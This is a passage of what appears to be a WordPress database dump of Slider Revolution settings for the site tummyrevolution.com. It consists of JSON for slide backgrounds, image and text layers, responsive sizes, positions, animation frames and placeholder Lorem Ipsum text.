center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide3-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"Power3.easeOut\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h10-slide3-graphic2.jpg\",\"imageId\":2942},\"size\":{\"width\":{\"d\":{\"v\":\"641px\",\"e\":true},\"n\":{\"v\":\"542px\",\"e\":true},\"t\":{\"v\":\"641px\",\"e\":true},\"m\":{\"v\":\"599px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"388px\",\"e\":true},\"n\":{\"v\":\"328px\",\"e\":true},\"t\":{\"v\":\"388px\",\"e\":true},\"m\":{\"v\":\"363px\",\"e\":true}},\"originalWidth\":648,\"originalHeight\":389,\"aspectRatio\":{\"d\":{\"v\":1.665809768637532162216530196019448339939117431640625},\"n\":{\"v\":1.665809768637532162216530196019448339939117431640625},\"t\":{\"v\":1.665809768637532162216530196019448339939117431640625},\"m\":{\"v\":1.665809768637532162216530196019448339939117431640625}}},\"position\":{\"x\":{\"d\":{\"v\":\"170px\",\"e\":true},\"n\":{\"v\":\"241px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"160px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"170px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":400},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":400,\"startRelative\":400},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":400,\"startRelative\":400},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":600,\"start\":2000,\"startRelative\":600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"2\":{\"text\":\" Integer tincidunt dui ac velit facilisis, pretium efficitur lorem scelerisque. Vestibulum gravida leo non enim feugiat.\",\"alias\":\" Integer tincidunt d...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"304px\",\"e\":true},\"n\":{\"v\":\"293px\",\"e\":true},\"t\":{\"v\":\"304px\",\"e\":true},\"m\":{\"v\":\"182px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"70px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"70px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"304px\",\"originalHeight\":\"70px\"},\"position\":{\"x\":{\"d\":{\"v\":\"210px\",\"e\":true},\"n\":{\"v\":\"349px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"66px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"240px\",\"e\":true},\"n\":{\"v\":\"188px\",\"e\":true},\"t\":{\"v\":\"250px\",\"e\":true},\"m\":{\"v\":\"185px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":400},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":400,\"startRelative\":400},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":400,\"startRelative\":400},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":600,\"start\":2000,\"startRelative\":600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"15px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"21px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(21,8,4,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide4-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"Power3.easeOut\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}}}','{\"11\":{\"text\":\" \",\"alias\":\"Shape\",\"uid\":11,\"size\":{\"width\":{\"d\":{\"v\":\"800px\",\"e\":true},\"n\":{\"v\":\"620px\",\"e\":true},\"t\":{\"v\":\"620px\",\"e\":true},\"m\":{\"v\":\"383px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"570px\",\"e\":true},\"n\":{\"v\":\"480px\",\"e\":true},\"t\":{\"v\":\"480px\",\"e\":true},\"m\":{\"v\":\"472\",\"e\":true}},\"originalWidth\":\"800px\",\"originalHeight\":\"570px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-401px\",\"e\":true},\"n\":{\"v\":\"-210px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"90px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"140px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"#ffffff\",\"borderColor\":\"rgba(0,0,0,0.5)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"type\":\"shape\"},\"5\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content.\",\"alias\":\"It is a long establi...\",\"uid\":5,\"size\":{\"width\":{\"d\":{\"v\":\"652px\",\"e\":true},\"n\":{\"v\":\"525px\",\"e\":true},\"t\":{\"v\":\"494px\",\"e\":true},\"m\":{\"v\":\"298px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"90px\",\"e\":true},\"t\":{\"v\":\"88px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"652px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-397px\",\"e\":true},\"n\":{\"v\":\"-200px\",\"e\":true},\"t\":{\"v\":\"15px\",\"e\":true},\"m\":{\"v\":\"-563px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"-30px\",\"e\":true},\"t\":{\"v\":\"-63px\",\"e\":true},\"m\":{\"v\":\"359px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"25px\",\"e\":true},\"m\":{\"v\":\"21px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e